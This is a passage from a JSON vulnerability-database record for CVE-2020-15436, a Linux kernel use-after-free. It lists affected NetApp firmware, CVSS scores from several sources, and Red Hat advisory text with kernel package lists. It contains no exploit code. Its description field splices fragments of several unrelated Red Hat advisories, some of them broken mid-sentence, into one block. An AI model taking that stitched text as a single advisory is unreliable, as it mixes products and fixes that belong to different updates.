                    "cpe23Uri": "cpe:2.3:o:netapp:aff_8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas_8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas_8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fabric-attached_storage_a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fabric-attached_storage_a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a250_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_500f_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_500f:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas_500f_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas_500f:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "163248"
      },
      {
        "db": "PACKETSTORM",
        "id": "162346"
      },
      {
        "db": "PACKETSTORM",
        "id": "161259"
      },
      {
        "db": "PACKETSTORM",
        "id": "161258"
      },
      {
        "db": "PACKETSTORM",
        "id": "161250"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      }
    ],
    "trust": 1.2
  },
  "cve": "CVE-2020-15436",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2020-15436",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-168414",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 6.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-15436",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-15436",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202011-1793",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-168414",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-15436",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-168414"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-15436"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field. Linux Kernel Exists in a vulnerability related to the use of freed memory.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1915461 - RHACM 2.0.8 images\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n\n5. 7.6) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* [infiniband] Backport Request to fix Multicast Sendonly joins\n(BZ#1937820)\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1899804 - CVE-2020-28374 kernel: SCSI target (LIO) write to any block on ILO backstore\n1901168 - CVE-2020-15436 kernel: use-after-free in fs/block_dev.c\n1930078 - CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem\n1930079 - CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles\n1930080 - CVE-2021-27364 kernel: out-of-bounds read in libiscsi module\n\n6. 7) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* kernel-rt: update to the latest RHEL7.9.z3 source tree (BZ#1906133)\n\n* [kernel-rt] WARNING: CPU: 8 PID: 586 at kernel/sched/core.c:3644\nmigrate_enable+0x15f/0x210 (BZ#1916123)\n\n* [kernel-rt-debug] [ BUG: bad unlock balance detected! ] [RHEL-7.9.z]\n(BZ#1916130)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2021:0336-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:0336\nIssue date:        2021-02-02\nCVE Names:         CVE-2020-15436 CVE-2020-35513\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: use-after-free in fs/block_dev.c (CVE-2020-15436)\n\n* kernel: Nfsd failure to clear umask after processing an open or create\n(CVE-2020-35513)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* double free issue in filelayout_alloc_commit_info (BZ#1679980)\n\n* Regression: Plantronics Device SHS2355-11 PTT button does not work after\nupdate to 7.7 (BZ#1769502)\n\n* Openstack network node reports unregister_netdevice: waiting for\nqr-3cec0c92-9a to become free. Usage count = 1 (BZ#1809519)\n\n* dlm: add ability to interrupt waiting for acquire POSIX lock (BZ#1826858)\n\n* [Azure][RHEL7] soft lockups and performance loss occurring during final\nfsync with parallel dd writes to xfs filesystem in azure instance\n(BZ#1859364)\n\n* Guest crashed when hotplug vcpus on booting kernel stage (BZ#1866138)\n\n* soft lockup occurs while a thread group leader is waiting on\ntasklist_waiters in mm_update_next_owner() where a huge number of the\nthread group members are exiting and trying to take the tasklist_lock. \n(BZ#1872110)\n\n* [DELL EMC 7.6 BUG] Kioxia CM6 NVMe drive fails to enumerate (BZ#1883403)\n\n* [Hyper-V][RHEL7] Request to included a commit that adds a timeout to\nvmbus_wait_for_unload (BZ#1888979)\n\n* Unable to discover the LUNs from new storage port (BZ#1889311)\n\n* RHEL 7.9 Kernel panic at ceph_put_snap_realm+0x21 (BZ#1890386)\n\n* A hard lockup occurrs where one task is looping in an sk_lock spinlock\nthat has been taken by another task running timespec64_add_ns(). \n(BZ#1890911)\n\n* ethtool/mlx5_core provides incorrect SFP module info (BZ#1896756)\n\n* RHEL7.7 - zcrypt: Fix ZCRYPT_PERDEV_REQCNT ioctl (BZ#1896826)\n\n* RHEL7.7 - s390/dasd: Fix zero write for FBA devices (BZ#1896839)\n\n* [Azure]IP forwarding issue in netvsc[7.9.z] (BZ#1898280)\n\n* Security patch for CVE-2020-25212 breaks directory listings via \u0027ls\u0027 on\nNFS V4.2 shares mounted with selinux enabled labels (BZ#1917504)\n\nEnhancement(s):\n\n* RFE : handle better ERRbaduid on SMB1 (BZ#1847041)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1901168 - CVE-2020-15436 kernel: use-after-free in fs/block_dev.c\n1905208 - CVE-2020-35513 kernel: fix nfsd failure to clear umask after processing an open or create [rhel-7]\n1911309 - CVE-2020-35513 kernel: Nfsd failure to clear umask after processing an open or create\n1917504 - Security patch for CVE-2020-25212 breaks directory listings via \u0027ls\u0027 on NFS V4.2 shares mounted with selinux enabled labels\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1160.15.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.15.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.15.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-1160.15.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.15.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.15.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1160.15.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.15.2.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1160.15.2.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debug-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-devel-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-headers-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-tools-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1160.15.2.el7.ppc64.rpm\nperf-3.10.0-1160.15.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\npython-perf-3.10.0-1160.15.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1160.15.2.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1160.15.2.el7.ppc64le.rpm\nperf-3.10.0-1160.15.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\npython-perf-3.10.0-1160.15.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1160.15.2.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-debug-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-devel-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-headers-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-kdump-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1160.15.2.el7.s390x.rpm\nperf-3.10.0-1160.15.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm\npython-perf-3.10.0-1160.15.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1160.15.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1160.15.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1160.15.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1160.15.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.15.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.15.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 